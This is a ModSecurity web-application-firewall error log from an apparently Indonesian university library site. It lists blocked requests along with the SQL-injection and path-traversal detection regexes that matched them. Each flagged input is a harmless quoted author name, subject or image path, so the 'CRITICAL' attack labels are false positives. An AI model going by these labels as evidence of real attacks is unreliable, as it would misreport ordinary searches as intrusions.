"PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyCZMCo-f0AAMEsuEMAAAAS"]
[Mon Aug 28 18:20:49.634549 2023] [:error] [pid 49491] [client 40.77.167.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22SN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyDEcCo-f0AAMFTdmcAAAAK"]
[Mon Aug 28 18:25:10.411261 2023] [:error] [pid 49383] [client 85.208.96.208] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22SOEHARTO, IMAN.\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyEFsCo-f0AAMDnzXcAAAAE"]
[Mon Aug 28 18:25:12.036731 2023] [:error] [pid 49546] [client 85.208.96.199] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22BAHASA JAWA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyEGMCo-f0AAMGKoj8AAAAK"]
[Mon Aug 28 18:26:34.825150 2023] [:error] [pid 49547] [client 47.128.28.179] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22ANORAGA, PANDJI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyEasCo-f0AAMGLlnAAAAAC"]
[Mon Aug 28 18:26:57.781451 2023] [:error] [pid 49510] [client 85.208.96.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22YURISPRUDENSI MAHKAMAH AGUNG RI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyEgcCo-f0AAMFmmg0AAAAV"]
[Mon Aug 28 18:31:53.158542 2023] [:error] [pid 49594] [client 85.208.96.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22H.K. Martono\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyFqcCo-f0AAMG6y3kAAAAI"]
[Mon Aug 28 18:31:55.718911 2023] [:error] [pid 49593] [client 85.208.96.199] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22OCTAVIANTY, YUKE\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyFq8Co-f0AAMG55VYAAAAC"]
[Mon Aug 28 18:34:10.055292 2023] [:error] [pid 49595] [client 85.208.96.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22MULYADI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyGMsCo-f0AAMG7h0AAAAAM"]
[Mon Aug 28 18:34:25.109589 2023] [:error] [pid 49600] [client 85.208.96.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22UU RI TENTANG PENGADILAN TINDAK PIDANA KORUPSI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyGQcCo-f0AAMHA7U8AAAAN"]
[Mon Aug 28 18:34:53.161632 2023] [:error] [pid 49649] [client 85.208.96.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22SISTEM PERBANKAN DALAM ISLAM\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyGXcCo-f0AAMHxr8QAAAAT"]
[Mon Aug 28 18:36:37.875146 2023] [:error] [pid 49642] [client 85.208.96.204] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22KAST, FREMONT E.\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyGxcCo-f0AAMHqqJoAAAAD"]
[Mon Aug 28 18:39:08.255059 2023] [:error] [pid 49626] [client 85.208.96.209] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22MANAJEMEN EMOSI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyHXMCo-f0AAMHaSZgAAAAC"]
[Mon Aug 28 18:39:22.778961 2023] [:error] [pid 49725] [client 85.208.96.205] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22AKUTANSI MANAJEMEN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyHasCo-f0AAMI9GKkAAAAB"]
[Mon Aug 28 18:39:37.424973 2023] [:error] [pid 49663] [client 85.208.96.210] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22FARIDA, ANNA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyHecCo-f0AAMH-czEAAAAJ"]
[Mon Aug 28 18:45:21.724498 2023] [:error] [pid 49805] [client 85.208.96.210] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22FARID\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyI0cCo-f0AAMKN@5MAAAAQ"]
[Mon Aug 28 18:45:46.324457 2023] [:error] [pid 49887] [client 47.128.29.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22STATISTIKA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyI6sCo-f0AAMLfFFIAAAAV"]
[Mon Aug 28 18:50:52.698010 2023] [:error] [pid 49971] [client 47.128.19.0] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22BANGUN, WILSON\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyKHMCo-f0AAMMzRVsAAAAP"]
[Mon Aug 28 18:55:40.997235 2023] [:error] [pid 49956] [client 47.128.20.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22ETIKA POFESI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyLPMCo-f0AAMMkDr8AAAAJ"]
[Mon Aug 28 18:55:41.593871 2023] [:error] [pid 49956] [client 47.128.20.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22ETIKA POFESI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyLPcCo-f0AAMMkDsAAAAAJ"]
[Mon Aug 28 18:56:50.080750 2023] [:error] [pid 50033] [client 47.128.18.193] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22ABDAD, ZAIDI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyLgsCo-f0AAMNxX2kAAAAD"]
[Mon Aug 28 19:00:01.898494 2023] [:error] [pid 50073] [client 85.208.96.211] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22AL- KHARASYI,  SHALIH IBN SULAIMAN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyMQcCo-f0AAMOZiPoAAAAH"]
[Mon Aug 28 19:03:44.792876 2023] [:error] [pid 50098] [client 47.128.25.244] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/docs/COVER_BUKU20230224_11090155.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZOyNIMCo-f0AAMOySDIAAAAC"]
[Mon Aug 28 19:08:23.886331 2023] [:error] [pid 50197] [client 85.208.96.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22SN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyON8Co-f0AAMQVK28AAAAP"]
[Mon Aug 28 19:08:25.473714 2023] [:error] [pid 50144] [client 85.208.96.196] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22DESAIN PENCAHAYAAN ARSITEKTURAL\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyOOcCo-f0AAMPgPzcAAAAH"]
[Mon Aug 28 19:10:52.488197 2023] [:error] [pid 50330] [client 85.208.96.205] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22EDWARD T. WHITE\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyOzMCo-f0AAMSau-cAAAAO"]
[Mon Aug 28 19:14:55.979973 2023] [:error] [pid 50437] [client 85.208.96.196] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22TATABAHASA INDONESIA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyPv8Co-f0AAMUFEQ4AAAAa"]
[Mon Aug 28 19:17:17.419341 2023] [:error] [pid 50463] [client 85.208.96.199] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22MUDAH BELAJAR\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyQTcCo-f0AAMUfUFgAAAAR"]
[Mon Aug 28 19:25:48.937603 2023] [:error] [pid 50668] [client 47.128.20.41] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22SUPRIADI, DEDI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOySTMCo-f0AAMXsYOwAAAAS"]
